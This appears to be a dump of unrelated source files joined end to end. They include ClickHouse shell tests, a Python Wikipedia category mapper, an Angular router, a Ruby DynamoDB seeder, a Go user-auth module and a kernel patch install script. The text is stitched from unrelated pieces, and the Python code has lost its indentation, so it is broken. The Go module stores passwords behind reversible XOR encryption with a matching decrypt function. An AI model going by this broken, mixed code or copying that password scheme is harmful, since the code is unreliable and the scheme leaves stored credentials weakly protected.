$CLICKHOUSE_CLIENT --readonly=1 --multiquery --query="set output_format_json_quote_64bit_integers=1 ; select toUInt64(pow(2, 63)) as value format JSON" --server_logs_file=/dev/null 2>&1 | grep -o 'value\|Cannot modify .* setting in readonly mode'
$CLICKHOUSE_CLIENT --readonly=1 --multiquery --query="set output_format_json_quote_64bit_integers=0 ; select toUInt64(pow(2, 63)) as value format JSON" --server_logs_file=/dev/null 2>&1 | grep -o 'value\|Cannot modify .* setting in readonly mode'
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&query=SELECT+toUInt64(pow(2,+63))+as+value+format+JSON&output_format_json_quote_64bit_integers=1" | grep value
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&query=SELECT+toUInt64(pow(2,+63))+as+value+format+JSON&output_format_json_quote_64bit_integers=0" | grep value
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&session_id=readonly&session_timeout=3600" -d 'SET readonly = 1'
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&session_id=readonly&query=SELECT+toUInt64(pow(2,+63))+as+value+format+JSON&output_format_json_quote_64bit_integers=1" 2>&1 | grep -o 'value\|Cannot modify .* setting in readonly mode.'
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&session_id=readonly&query=SELECT+toUInt64(pow(2,+63))+as+value+format+JSON&output_format_json_quote_64bit_integers=0" 2>&1 | grep -o 'value\|Cannot modify .* setting in readonly mode'
|
for i in range(1, 10):
for j in range(1, i):
print("*", end="")
print() |
import numpy as np
import networkx as nx
import re
class article_to_category():
"""
Class to map wikipedia articles to a category vector which can then be used as a content vector for content based recommender systems.
To run this class you need to have run some of the functions in wiki_categories.py to create the graph links and category index.
Example of the class being run could be:
-----------
from pyspark.sql.types import StructType
import json
import pickle
#load and create the files necessary
category_idx = pickle.load( open("category_index.p", 'rb'))
high_level_categories = ['Geography', 'Health', 'History', 'Humanities', 'Literature', 'Mathematics', \
'Nature', 'People', 'Philosophy', 'Reference_works', 'Science', 'Technology']
ac = article_to_category(high_level_categories, "category_index_graph_link", category_idx)
#bring in the wikipedia edits, using the json schema if you have it as it is a lot faster!
with open('wikipedia_full_text_schema.json', 'r') as json_schema_file:
schema = StructType.fromJson(json.load(json_schema_file))
wiki_rdd = sqlCtx.read.json('wiki_edits.json.gz', schema = schema)
article_mapping = ac.run_mapping(wiki_rdd)
-----------
"""
def __init__(self, high_level_categories, category_index_graph_link, category_idx):
"""
Class initializer to Loads the required files
Args:
high_level_idx: An array of the high level categories to map to e.g. ['Concepts', 'Life', 'Physical_universe', 'Society']
category_index_graph_link: Path to the csv of the category links as created from wiki_categories.create_linked_list()
category_idx: Dictionary of the categories to an index as created from wiki_categories.create_category_idx_dicts()
"""
#If the format does not have 'Category' in front like our example above we must add that in
main_topics = ['Category:' +a for a in high_level_categories]
self.high_level_idx = [category_idx[a] for a in main_topics]
#Load the Wikipedia category graph from the graph link. This is assumed to be a csv file
#File can be created using code from wiki_categories.create_linked_list()
dg = nx.DiGraph()
self.category_index_graph = nx.read_adjlist(category_index_graph_link, 'rb', \
create_using=dg ,delimiter=',', nodetype = int)
self.category_idx = category_idx
def run_mapping(self, wiki_rdd):
"""
Maps articles in a wikipedia dump to the high level categories.
Will only return articles with a findable category mapping, so will skip those articles without categories
or for whom the mapping could otherwise not be found.
Args:
high_level_idx: the full wikipedia text loaded into an RDD (likely through sqlCtx.read.json)
Returns:
article_map: mapping of articles to the top level categories
"""
#Filter out uninteresting articles
filtered_rdd = wiki_rdd.rdd.filter(
lambda row:
row.redirect_target is None # Save only edits that are not redirects
and row.article_namespace == 0 # Save only edits on articles, not talk pages
and row.full_text is not None # Has text
)
#run the category mapping filtering out any articles where the mapping was not found
article_map = filtered_rdd.map(lambda row: (row.article_title, row.article_id, extract_categories(row.full_text))) \
.map(lambda (article_title, article_id, cats): self.category_mapping(article_title, article_id, cats)) \
.filter(lambda row: row != None)
return article_map
def category_mapping(self, article_title, article_id, cats):
parent_lengths_all = []
#only try to determine the category mapping if the article contains categories
#there are only a few articles without any categories
if len(cats)>0:
for c in cats:
c = clean_name(c)
cat_idx = self.category_idx[c]
#If the category cannot be determined from the category index
parent_lengths = np.ones(len(self.high_level_idx))*1000000000
if cat_idx!=[]:
parent_lengths = self.getParentArray(cat_idx)
parent_lengths_all.append(parent_lengths)
#a shorter length is better so the shortest path will receive a 1 and the longest a 0...the rest will scale in between
#also if there is at least one array with values (not the 10000000 vector) then the 100000 vectors should be removed first
#if there are no arrays with values then no array will be returned
if np.mean(parent_lengths_all, axis=0)[0]<1000000000:
clean_list = []
for pl in parent_lengths_all:
if pl[0]!=1000000000 and pl[0]!=0.:
clean_list.append(pl)
avg = np.mean(clean_list, axis=0)
min_val = min(avg)
max_val = max(avg)
diff = max_val-min_val
if diff==0: diff=1
content_vector = []
for t in avg:
new_val = ((t-min_val)**0*(max_val-t))/diff
content_vector.append(new_val)
return [article_id, content_vector]
def getParentArray(self, catID):
"""
From a given category ID, the function will then find the shortest path to the high level index list
If a path from the given category to a top level category cannot be found, then the distance will be 1000000000
Args:
catID: the originating category ID
Returns:
parent_lengths: the distance in the graph between the category ID and top level categories
"""
parent_lengths = []
for main_idx in self.high_level_idx:
dist = 1000000000
try:
paths = nx.shortest_path(self.category_index_graph, main_idx, catID)
dist = len(paths)
except:
pass
parent_lengths.append(dist)
return parent_lengths
def clean_name(catName):
"""
Cleans the category name so that it matches the same format as the category list
#TODO expand this list of cleans or determine encoding difference
Args:
catName: original category name as given in the wikipedia dump
Returns:
cleanName: the cleaned category name which matches the dbPedia dump
"""
cleanName = catName.replace(' ', '_')
cleanName = cleanName.replace('\u2013', '-')
return cleanName
def extract_categories(text):
"""Extract the Wikipedia categories from the full text of an article.
Returns a list of strings enumerating the categories for a Wikipedia
article by parsing the full text of the article. The strings are of the
form "Category:Foo" and do not contain the opening or closing square
brackets. If the article contains a sorting hint in the category (for
example, "[[Category:Foo|Sorting Hint]]") those are removed before
returning the category.
This function uses a regular expression: \[\[(Category:[^\[\]|]*)
This expression requires that the matched text starts with "[[" but does
not look for a closing "]]" as these can be arbitrarily far away if a
sorting hint is included.
Args:
text (str): The full text of a Wikipedia article in one string.
Returns:
list: A list containing strings of the categories a page belongs to.
The list is empty if the page belongs to no categories.
"""
# Since Regexes are unreadable, let me explain:
#
# "\[\[Category:[^\[\]]*)" consists of several parts:
#
# \[\[ matches "[["
#
# (...) is a capture group meaning roughly "the expression inside this
# group is a block that I want to extract"
#
# Category: matches the text "Category:"
#
# [^...] is a negated set which means "do not match any characters in
# this set".
#
# \[, \], and | match "[", "]", and "|" in the text respectively
#
# * means "match zero or more of the preceding regex defined items"
#
# So putting it all together, the regex does this:
#
# Finds "[[" followed by "Category:" and then matches any number
# (including zero) characters after that that are not the excluded
# characters "[", "]", or "|". When it hits an excluded character it
# stops and the text matched by the regex inside the (...) part is
# returned.
return re.findall(r'\[\[(Category:[^\[\]|]*)', text) |
import { NgModule } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';
import { ColorsComponent } from './colors.component';
import { TypographyComponent } from './typography.component';
import { SchoolComponent } from './school.component';
import { TutorComponent } from './tutor/tutor.component';
import { MessageDetailComponent } from './message-detail/message-detail.component';
const routes: Routes = [
{
path: '',
data: {
title: 'school'
},
children: [
{
path: '',
redirectTo: 'colors'
},
{
path: 'message',
component: ColorsComponent,
data: {
title: 'Colors'
}
},
{
path: 'typography',
component: SchoolComponent,
data: {
title: 'Typography'
}
},
{
path: 'applictions',
component: SchoolComponent,
data: {
title: 'school'
}
},
{
path: 'tutor',
component: TutorComponent,
data: {
title: 'tutor'
}
},
{
path: 'detailMessage/:parentId',
component: MessageDetailComponent,
data: {
title: 'message'
}
}
]
}
];
@NgModule({
imports: [RouterModule.forChild(routes)],
exports: [RouterModule]
})
export class ThemeRoutingModule {}
|
require 'csv'
require 'json'
require 'aws-sdk-dynamodb'
require 'securerandom'
dynamodb = Aws::DynamoDB::Client.new(region: 'us-west-1',
profile: 'election-simulation')
candidates = ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]
def state_array
%w(AK AL AR AZ CA CO CT DC DE FL GA HI IA ID IL IN KS KY LA MA MD ME MI MN MO MS MT NC ND NE NH NJ NM NV NY OH OK OR PA RI SC SD TN TX UT VA VT WA WI WV WY)
end
state_array.each_with_index do |state, index|
candidates.each do |name|
puts "#{name} #{state}"
state_item = {
candidate: name,
state: state,
count: 0
}
params = {
table_name: 'Results',
item: state_item
}
begin
result = dynamodb.put_item(params)
rescue Aws::DynamoDB::Errors::ServiceError => error
puts 'Unable to add state'
puts params.to_json
puts error.message
end
end
end
puts "finished"
|
<reponame>rsuite/rsuite-icons<filename>src/icons/legacy/CreditCardAlt.tsx
// Generated by script, don't edit it please.
import createSvgIcon from '../../createSvgIcon';
import CreditCardAltSvg from '@rsuite/icon-font/lib/legacy/CreditCardAlt';
const CreditCardAlt = createSvgIcon({
as: CreditCardAltSvg,
ariaLabel: 'credit card alt',
category: 'legacy',
displayName: 'CreditCardAlt'
});
export default CreditCardAlt;
|
<gh_stars>0
import numpy as np
from mushroom.algorithms.value import QLearning
from mushroom.core import Core
from mushroom.environments import *
from mushroom.policy import EpsGreedy
from mushroom.utils.parameters import Parameter
"""
Simple script to solve a simple chain with Q-Learning.
"""
def experiment():
np.random.seed()
# MDP
mdp = generate_simple_chain(state_n=5, goal_states=[2], prob=.8, rew=1,
gamma=.9)
# Policy
epsilon = Parameter(value=.15)
pi = EpsGreedy(epsilon=epsilon)
# Agent
learning_rate = Parameter(value=.2)
algorithm_params = dict(learning_rate=learning_rate)
agent = QLearning(pi, mdp.info, **algorithm_params)
# Algorithm
core = Core(agent, mdp)
# Train
core.learn(n_steps=10000, n_steps_per_fit=1)
if __name__ == '__main__':
experiment()
|
<filename>src/domain/WishList.java<gh_stars>0
package domain;
import java.util.ArrayList;
public class WishList extends DomainObject {
private ArrayList<Product> wishlist;
private RegisteredUser user;
private Product toDelete;
public WishList(RegisteredUser user) {
this.user = user;
wishlist = new ArrayList<Product>();
}
public WishList() {
}
@Override
public long getId() {
return this.user.getId();
};
public ArrayList<Product> getWishlist() {
return wishlist;
}
public void setWishlist(Product product) {
if (!wishlist.contains(product)) {
this.wishlist.add(product);
}
}
public Product getToDelete() {
return toDelete;
}
public void setToDelete(Product product) {
this.toDelete = product;
}
public void removeItem(Product product) {
wishlist.remove(product);
}
public RegisteredUser getUser() {
return this.user;
}
public void setId(long id) {
user.setId(id);
}
}
|
from .fanova import FunctionalANOVA
__all__ = ['FunctionalANOVA'] |
/*
* Tencent is pleased to support the open source community by making 蓝鲸 available.
* Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
package log
var (
// Info logs to waring error fatal
Info func(args ...interface{})
// Infof logs to warning error fatal
Infof func(format string, args ...interface{})
// Warning logs to warning error fatal.
Warning func(args ...interface{})
// Warningf logs to warning error fatal.
Warningf func(format string, args ...interface{})
// Error logs to the error fatal
Error func(args ...interface{})
// Errorf logs to the error fatal
Errorf func(format string, args ...interface{})
// Fatal logs to the fatal
Fatal func(args ...interface{})
// Fatalf logs to fatal
Fatalf func(format string, args ...interface{})
)
// SetLoger set a new loger instance
func SetLoger(target *Logger) {
// Infof print info
Infof = target.Infof
// Info print info
Info = target.Info
// Warning print warning
Warning = target.Warning
// Warningf print the warningf
Warningf = target.Warningf
// Error print the error info
Error = target.Error
// Errorf print the error info
Errorf = target.Errorf
// Fatal print the fatal
Fatal = target.Fatal
// Fatalf print the fatal
Fatalf = target.Fatalf
}
// Logger implements the Loger interface
type Logger struct {
// Info logs to the INFO logs.
Info func(args ...interface{})
Infof func(format string, args ...interface{})
// Warning logs to the WARNING and INFO logs.
Warning func(args ...interface{})
Warningf func(format string, args ...interface{})
// Error logs to the ERROR、 WARNING and INFO logs.
Error func(args ...interface{})
Errorf func(format string, args ...interface{})
// Fatal logs to the FATAL, ERROR, WARNING, and INFO logs.
Fatal func(args ...interface{})
Fatalf func(format string, args ...interface{})
}
|
<reponame>Supermoon-JH/OpenSource_Project<filename>src/final project/javascript/search.js
// 전역 변수 설정
let data;
let keyword;
window.onload = function () {
//search 라는 id 가진 태그에 change 이벤트 부여
document.getElementById('search').addEventListener('change', (e) => {
keyword = e.target.value // input 에다가 입력하면 전역변수 keyword 값이 바꿔지도록 하는 부분
});
// search_btn 라는 id 가진 태그에 click 이벤트 부여
document.getElementById('search_btn').addEventListener('click', () => {
Search(); // 클릭하면 옆에 함수 호출
});
let xhr = new XMLHttpRequest();
xhr.open("GET", "/vegan/py/data_backup.xlsx", true);
xhr.responseType = "blob";
xhr.onload = function (e) {
let file = this.response;
let reader = new FileReader();
if (reader.readAsBinaryString) {
reader.onload = function (e) {
let workbook = XLSX.read(e.target.result, {type: 'binary'});
let firstSheet = workbook.SheetNames[0];
let excelRows = XLSX.utils.sheet_to_row_object_array(workbook.Sheets[firstSheet]);
data = excelRows
};
reader.readAsBinaryString(file);
}
};
xhr.send();
}
// 검색하는 함수
function Search() {
// 일단 변수 선언 (값은 할당 x)
let items;
// 이미 검색을 한번 해서 검색 결과값이 화면에 있으면 지워주고 없으면 새로 만들어서 진행.
if (!document.getElementById('items')) {
items = document.createElement('div')
items.setAttribute('id', 'items')
} else {
document.getElementById('items').remove()
items = document.createElement('div')
items.setAttribute('id', 'items')
}
for (let i = 0; i < data.length; i++) {
if (data[i].prd_name.split(' ').includes(keyword)) {
let item = document.createElement('div')
item.setAttribute('class', 'item')
let prd_name = document.createElement('p')
prd_name.innerHTML = data[i].prd_name
prd_name.style.fontWeight = 'bold'
let prd_price = document.createElement('p')
prd_price.innerHTML = data[i].prd_price + ' 원'
prd_price.style.textAlign = 'right'
prd_price.style.fontSize = '12px'
let prd_detail = document.createElement('p')
prd_detail.innerHTML = data[i].prd_detail
prd_detail.style.maxHeight = '100px'
prd_detail.style.overflow = 'scroll'
let prd_img = document.createElement('img')
prd_img.setAttribute('src', data[i].prd_img)
item.appendChild(prd_img)
item.appendChild(prd_name)
item.appendChild(prd_price)
item.appendChild(prd_detail)
items.appendChild(item)
}
}
document.getElementById('result').appendChild(items)
}
|
package desarrollomobile.tiendadeclases.tiendadeclases.Service;
import android.os.Parcel;
import android.os.Parcelable;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
public class SubCategorias implements Parcelable {
@SerializedName("imagen")
@Expose
private String imagen;
@SerializedName("nombre")
@Expose
private String nombre;
@SerializedName("subCats")
@Expose
private String subCats;
public String getImagen() {
return imagen;
}
public void setImagen(String imagen) {
this.imagen = imagen;
}
public String getNombre() {
return nombre;
}
public void setNombre(String nombre) {
this.nombre = nombre;
}
public String getSubCats() {
return subCats;
}
public void setSubCats(String subCats) {
this.subCats = subCats;
}
@Override
public int describeContents() {
return 0;
}
@Override
public void writeToParcel(Parcel dest, int flags) {
dest.writeString(this.imagen);
dest.writeString(this.nombre);
dest.writeString(this.subCats);
}
public SubCategorias() {
}
protected SubCategorias(Parcel in) {
this.imagen = in.readString();
this.nombre = in.readString();
this.subCats = in.readString();
}
public static final Parcelable.Creator<SubCategorias> CREATOR = new Parcelable.Creator<SubCategorias>() {
@Override
public SubCategorias createFromParcel(Parcel source) {
return new SubCategorias(source);
}
@Override
public SubCategorias[] newArray(int size) {
return new SubCategorias[size];
}
};
}
|
/*
* Bulldozer Framework
* Copyright (C) DesertBit
*/
package auth
import (
r "github.com/dancannon/gorethink"
db "github.com/desertbit/bulldozer/database"
"fmt"
"github.com/desertbit/bulldozer/log"
"github.com/desertbit/bulldozer/settings"
"github.com/desertbit/bulldozer/utils"
"strings"
"time"
)
const (
DBUserTable = "users"
DBUserTableIndex = "LoginName"
maxLength = 100
minPasswordLength = 8
// A simple addition to the goji.Config.PasswordKey.
// This might be useful, if the password key is stolen from the config,
// however it isn't the final password encryption key.
additionalPasswordKey = "bpw"
cleanupLoopTimeout = 1 * time.Hour // Each one hour.
)
var (
stopCleanupLoop chan struct{} = make(chan struct{})
)
func init() {
db.OnSetup(setupDB)
db.OnCreateIndexes(createIndexes)
}
//########################//
//### Database Structs ###//
//########################//
type dbUser struct {
ID string `gorethink:"id"`
LoginName string
Name string
EMail string
PasswordHash string
Enabled bool
LastLogin int64
Created int64
Groups []string
}
//#######################//
//### Private Methods ###//
//#######################//
func setupDB() error {
// Create the users table.
err := db.CreateTable(DBUserTable)
if err != nil {
return err
}
return nil
}
func createIndexes() error {
// Create a secondary index on the LoginName attribute.
_, err := r.Table(DBUserTable).IndexCreate(DBUserTableIndex).Run(db.Session)
if err != nil {
return err
}
// Wait for the index to be ready to use.
_, err = r.Table(DBUserTable).IndexWait(DBUserTableIndex).Run(db.Session)
if err != nil {
return err
}
return nil
}
func initDB() {
// Start the cleanup loop in a new goroutine.
go cleanupLoop()
}
func releaseDB() {
// Stop the loop by triggering the quit trigger.
close(stopCleanupLoop)
}
func dbUserExists(loginName string) (bool, error) {
u, err := dbGetUser(loginName)
if err != nil {
return false, err
}
return u != nil, nil
}
func dbGetUser(loginName string) (*dbUser, error) {
if len(loginName) == 0 {
return nil, fmt.Errorf("failed to get database user: login name is empty!")
}
rows, err := r.Table(DBUserTable).GetAllByIndex(DBUserTableIndex, loginName).Run(db.Session)
if err != nil {
return nil, fmt.Errorf("failed to get database user '%s': %v", loginName, err)
}
// Check if nothing was found.
if rows.IsNil() {
return nil, nil
}
var u dbUser
err = rows.One(&u)
if err != nil {
// Check if nothing was found.
if err == r.ErrEmptyResult {
return nil, nil
}
return nil, fmt.Errorf("failed to get database user '%s': %v", loginName, err)
}
return &u, nil
}
func dbGetUserByID(id string) (*dbUser, error) {
if len(id) == 0 {
return nil, fmt.Errorf("failed to get database user: ID is empty!")
}
rows, err := r.Table(DBUserTable).Get(id).Run(db.Session)
if err != nil {
return nil, fmt.Errorf("failed to get database user by ID '%s': %v", id, err)
}
// Check if nothing was found.
if rows.IsNil() {
return nil, nil
}
var u dbUser
err = rows.One(&u)
if err != nil {
// Check if nothing was found.
if err == r.ErrEmptyResult {
return nil, nil
}
return nil, fmt.Errorf("failed to get database user by ID '%s': %v", id, err)
}
return &u, nil
}
func dbAddUser(loginName string, name string, email string, password string, removeOnExpire bool, groups ...string) (u *dbUser, err error) {
// Prepare the inputs.
loginName = strings.TrimSpace(loginName)
name = strings.TrimSpace(name)
email = strings.TrimSpace(email)
// Validate the inputs.
if len(loginName) == 0 || len(loginName) > maxLength ||
len(name) == 0 || len(name) > maxLength ||
len(email) == 0 || len(email) > maxLength ||
len(password) == 0 || len(password) > maxLength {
if len(loginName) > maxLength {
loginName = loginName[:maxLength]
}
return nil, fmt.Errorf("failed to add user '%s': input string sizes are invalid!", loginName)
} else if len(password) < minPasswordLength {
return nil, fmt.Errorf("failed to add user '%s': new passord is to short!", loginName)
}
// Check if the user already exists.
exist, err := dbUserExists(loginName)
if err != nil {
return nil, err
} else if exist {
return nil, fmt.Errorf("failed to add user: user '%s' already exists!", loginName)
}
// Hash and encrypt the password.
password = <PASSWORD>Password(password)
// Create a new unique User ID.
id, err := db.UUID()
if err != nil {
return nil, err
}
// Check if the groups exists.
if len(groups) > 0 {
for _, g := range groups {
if !groupExists(g) {
return nil, fmt.Errorf("failed to add user '%s': the group '%s' does not exists!", loginName, g)
}
}
}
// Create a new user.
u = &dbUser{
ID: id,
LoginName: loginName,
Name: name,
EMail: email,
PasswordHash: password,
Enabled: true,
LastLogin: 0,
Created: time.Now().Unix(),
Groups: groups,
}
if removeOnExpire {
u.LastLogin = -1
}
// Insert it to the database.
_, err = r.Table(DBUserTable).Insert(u).RunWrite(db.Session)
if err != nil {
return nil, fmt.Errorf("failed to insert new user '%s' to database table: %v", loginName, err)
}
return u, nil
}
func dbUpdateUser(u *dbUser) error {
// Check if the groups exists.
// They might have changed.
if len(u.Groups) > 0 {
for _, g := range u.Groups {
if !groupExists(g) {
return fmt.Errorf("failed to update user '%s': the group '%s' does not exists!", u.LoginName, g)
}
}
}
_, err := r.Table(DBUserTable).Get(u.ID).Update(u).RunWrite(db.Session)
if err != nil {
return err
}
return nil
}
func dbRemoveUsers(ids ...string) error {
if len(ids) == 0 {
return nil
}
idsI := make([]interface{}, len(ids))
for i, id := range ids {
idsI[i] = id
}
// Remove the passed users with the given IDs.
_, err := r.Table(DBUserTable).GetAll(idsI...).
Delete().RunWrite(db.Session)
if err != nil {
return fmt.Errorf("failed to remove users by IDs '%+v': %v", ids, err)
}
// Trigger the event.
for _, id := range ids {
triggerOnRemovedUser(id)
}
return nil
}
func dbUpdateLastLogin(u *dbUser) error {
// Set the last login time
u.LastLogin = time.Now().Unix()
return dbUpdateUser(u)
}
func dbChangePassword(u *dbUser, newPassword string) error {
// Validate input.
if len(newPassword) < minPasswordLength {
return fmt.Errorf("failed to change password for user '%s': the new passord is to short", u.LoginName)
}
// Hash and encrypt the password.
u.PasswordHash = hashPassword(newPassword)
return dbUpdateUser(u)
}
// TODO: Add an option to retrieve batched users. Don't return all at once!
func dbGetUsersInGroup(group string) ([]*dbUser, error) {
// Execute the query.
rows, err := r.Table(DBUserTable).Filter(r.Row.Field("Groups").Contains(group)).Run(db.Session)
if err != nil {
return nil, fmt.Errorf("failed to get all database users: %v", err)
}
// Get the users from the query.
var users []*dbUser
err = rows.All(&users)
if err != nil {
return nil, fmt.Errorf("failed to get all database users: %v", err)
}
return users, nil
}
//########################//
//### Password methods ###//
//########################//
func hashPassword(password string) string {
// Hash and encrypt the password
return utils.EncryptXorBase64(additionalPasswordKey+settings.Settings.PasswordEncryptionKey, utils.Sha256Sum(password))
}
func decryptPasswordHash(hash string) (password string, err error) {
// Decrypt and generate the temporary SHA256 hash with the session ID and random token.
password, err = utils.DecryptXorBase64(additionalPasswordKey+settings.Settings.PasswordEncryptionKey, hash)
return
}
//###############//
//### Cleanup ###//
//###############//
func cleanupLoop() {
// Create a new ticker
ticker := time.NewTicker(cleanupLoopTimeout)
defer func() {
// Stop the ticker
ticker.Stop()
}()
for {
select {
case <-ticker.C:
// Cleanup some expired database data.
cleanupExpiredData()
case <-stopCleanupLoop:
// Just exit the loop
return
}
}
}
func cleanupExpiredData() {
// Create the expire timestamp.
expires := time.Now().Unix() - int64(settings.Settings.RemoveNotConfirmedUsersTimeout)
// Get all expired users.
rows, err := r.Table(DBUserTable).Filter(
r.Row.Field("LastLogin").Eq(-1).
And(r.Row.Field("Created").Sub(expires).Le(0))).
Run(db.Session)
if err != nil {
log.L.Error("failed to get all expired database users: %v", err)
return
}
// Get the users from the query.
var users []*dbUser
err = rows.All(&users)
if err != nil {
log.L.Error("failed to get all expired database users: %v", err)
return
}
if len(users) == 0 {
return
}
// Create the slice of IDs.
ids := make([]string, len(users))
for i, u := range users {
ids[i] = u.ID
}
// Remove the users.
err = dbRemoveUsers(ids...)
if err != nil {
log.L.Error("failed to remove all expired database users: %v", err)
return
}
return
}
|
#!/bin/sh
# CYBERWATCH SAS - 2017
#
# Security fix for RHSA-2013:0829
#
# Security announcement date: 2013-05-20 19:43:14 UTC
# Script generation date: 2017-01-17 21:18:26 UTC
#
# Operating System: Red Hat 6
# Architecture: x86_64
#
# Vulnerable packages fix on version:
# - kernel-rt-doc.noarch:3.6.11.2-rt33.39.el6rt
# - kernel-rt-firmware.noarch:3.6.11.2-rt33.39.el6rt
# - mrg-rt-release.noarch:3.6.11.2-rt33.39.el6rt
# - kernel-rt.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debug.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debug-debuginfo.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debug-devel.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debuginfo.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debuginfo-common-x86_64.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-devel.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-trace.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-trace-debuginfo.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-trace-devel.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-vanilla.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-vanilla-debuginfo.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-vanilla-devel.x86_64:3.6.11.2-rt33.39.el6rt
#
# Last versions recommanded by security team:
# - kernel-rt-doc.noarch:3.6.11.2-rt33.39.el6rt
# - kernel-rt-firmware.noarch:3.6.11.2-rt33.39.el6rt
# - mrg-rt-release.noarch:3.6.11.2-rt33.39.el6rt
# - kernel-rt.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debug.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debug-debuginfo.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debug-devel.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debuginfo.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debuginfo-common-x86_64.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-devel.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-trace.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-trace-debuginfo.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-trace-devel.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-vanilla.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-vanilla-debuginfo.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-vanilla-devel.x86_64:3.10.0-514.rt56.210.el6rt
#
# CVE List:
# - CVE-2013-0913
# - CVE-2013-0914
# - CVE-2013-1767
# - CVE-2013-1774
# - CVE-2013-1792
# - CVE-2013-1819
# - CVE-2013-1848
# - CVE-2013-1860
# - CVE-2013-1929
# - CVE-2013-1979
# - CVE-2013-2094
# - CVE-2013-2546
# - CVE-2013-2547
# - CVE-2013-2548
# - CVE-2013-2634
# - CVE-2013-2635
# - CVE-2013-3076
# - CVE-2013-3222
# - CVE-2013-3224
# - CVE-2013-3225
# - CVE-2013-3231
#
# More details:
# - https://www.cyberwatch.fr/vulnerabilites
#
# Licence: Released under The MIT License (MIT), See LICENSE FILE
sudo yum install kernel-rt-doc.noarch-3.6.11.2 -y
sudo yum install kernel-rt-firmware.noarch-3.6.11.2 -y
sudo yum install mrg-rt-release.noarch-3.6.11.2 -y
sudo yum install kernel-rt.x86_64-3.10.0 -y
sudo yum install kernel-rt-debug.x86_64-3.10.0 -y
sudo yum install kernel-rt-debug-debuginfo.x86_64-3.10.0 -y
sudo yum install kernel-rt-debug-devel.x86_64-3.10.0 -y
sudo yum install kernel-rt-debuginfo.x86_64-3.10.0 -y
sudo yum install kernel-rt-debuginfo-common-x86_64.x86_64-3.10.0 -y
sudo yum install kernel-rt-devel.x86_64-3.10.0 -y
sudo yum install kernel-rt-trace.x86_64-3.10.0 -y
sudo yum install kernel-rt-trace-debuginfo.x86_64-3.10.0 -y
sudo yum install kernel-rt-trace-devel.x86_64-3.10.0 -y
sudo yum install kernel-rt-vanilla.x86_64-3.10.0 -y
sudo yum install kernel-rt-vanilla-debuginfo.x86_64-3.10.0 -y
sudo yum install kernel-rt-vanilla-devel.x86_64-3.10.0 -y
|
def reverse_string(input_str):
reversed_str = ""
for i in range(len(input_str)-1,-1,-1):
reversed_str += input_str[i]
return reversed_str
print (reverse_string("Hello World!")) |
<reponame>tnir/gitlab-shell
package config
import (
"os"
"testing"
"github.com/prometheus/client_golang/prometheus"
"github.com/stretchr/testify/require"
"gitlab.com/gitlab-org/gitlab-shell/client/testserver"
"gitlab.com/gitlab-org/gitlab-shell/internal/testhelper"
)
func TestConfigApplyGlobalState(t *testing.T) {
t.Cleanup(testhelper.TempEnv(map[string]string{"SSL_CERT_DIR": "unmodified"}))
config := &Config{SslCertDir: ""}
config.ApplyGlobalState()
require.Equal(t, "unmodified", os.Getenv("SSL_CERT_DIR"))
config.SslCertDir = "foo"
config.ApplyGlobalState()
require.Equal(t, "foo", os.Getenv("SSL_CERT_DIR"))
}
func TestHttpClient(t *testing.T) {
url := testserver.StartHttpServer(t, []testserver.TestRequestHandler{})
config := &Config{GitlabUrl: url}
client, err := config.HttpClient()
require.NoError(t, err)
_, err = client.Get("http://host.com/path")
require.NoError(t, err)
ms, err := prometheus.DefaultGatherer.Gather()
require.NoError(t, err)
lastMetric := ms[0]
require.Equal(t, lastMetric.GetName(), "gitlab_shell_http_request_seconds")
labels := lastMetric.GetMetric()[0].Label
require.Equal(t, "code", labels[0].GetName())
require.Equal(t, "404", labels[0].GetValue())
require.Equal(t, "method", labels[1].GetName())
require.Equal(t, "get", labels[1].GetValue())
}
|
#!/bin/bash
docker build -t loco-django django
|
import { Result, Failure, Success} from "amonad"
type Position = [number, number]
type Units = 'km' | 'kilometer' | 'kilometers' | 'm' | 'meters' | 'meter' | 'metre' | 'cm' | 'centimeter' | 'centimeters' | 'mi' | 'mile' | 'miles' | 'feet' | 'ft' | 'in' | 'inch' | 'inches' | 'yd' | 'yard' | 'yards'
